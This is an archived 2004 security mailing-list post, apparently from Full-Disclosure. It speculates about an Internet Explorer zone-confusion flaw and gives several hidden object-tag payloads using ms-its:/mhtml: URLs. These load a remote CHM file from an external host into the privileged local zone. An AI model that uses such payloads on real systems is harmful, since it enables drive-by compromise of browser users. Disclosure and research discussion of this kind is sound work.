| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200406111417.i5BEHb4d002352@web123.megawebservers.com> From: 1 at malware.com (http-equiv@...ite.com) Subject: COELACANTH: After Math There is a sneaking suspicion that you can put the site contents in the so-called 'local zone' or 'my computer'. Since it validates the 'front end' of the address and ends up at the 'back end' this all would seem very similar to: <object data="ms-its:mhtml:file://C:foo.mhtml! http://www.malware.com//bad.chm::/foo.html" type="text/x- scriptlet" style="visibility:hidden"> where Internet Explorer gets 'confused' by the url mhtml:file://C:foo.mhtml! switches to the local zone as a result of C:, stays there and passes through to the 'back end' http://www.malware.com//bad.chm::/foo.html on the remote server while in the 'local zone' and renders foo.html in there. If this peculiar DNS setup also has a 'proper' chm file on it the following should work [as it does on any server setup]: <object data="ms-its:http://www.malware.com//bad.chm::/foo.html" type="text/x-scriptlet" style="visibility:hidden"> now as above if we include in the 'front end': ms- its:C:WINDOWSHelpiexplore.chm::/http://www.malware.com//bad.ch m::/foo.html It should see it as in C: and make its little 'zone' determination first, then pass through to the 'back end' http://www.malware.com//bad.chm::/foo.html and render foo.html in the 'local zone' even though it is on the remote server. You'd have to tinker quite a bit: ms-its:C:::/http://www.malware.com//bad.chm::/foo.html ms-its:C:%2Fredir=/http://www.malware.com//bad.chm::/foo.html etc. Anyone have a server they care to setup? -- http://www.malware.com
Powered by blists - more mailing lists